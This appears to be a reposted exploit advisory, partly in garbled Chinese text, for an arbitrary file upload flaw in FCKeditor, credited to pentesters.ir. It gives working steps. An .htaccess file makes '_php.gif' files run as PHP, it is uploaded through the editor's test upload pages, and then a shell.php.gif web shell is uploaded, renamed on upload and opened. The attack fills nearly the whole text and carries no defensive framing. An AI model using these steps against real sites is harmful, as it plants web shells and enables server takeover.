In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author??: pentesters.ir
[+] Website : WwW.PenTesters.IR

利用步驟:

1.創(chuàng)建一個(gè)htaccess文件:
代碼內(nèi)容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.使用編輯器上傳htaccess文件.

http://www.xxx.com/FCKeditor/editor/filemanager/upload/test.html

http://www.xxx.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上傳shell.php.gif

4.上傳后shell.php.gif, 會(huì)自動(dòng)被改名為 shell_php.gif

5.訪問(wèn)http://www.xxx.com/上傳目錄/shell_php.gif

轉(zhuǎn)載于:https://www.cnblogs.com/mujj/articles/2165996.html

總結(jié)

以上是生活随笔為你收集整理的FCKeditor所有版本任意文件上传缺陷的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。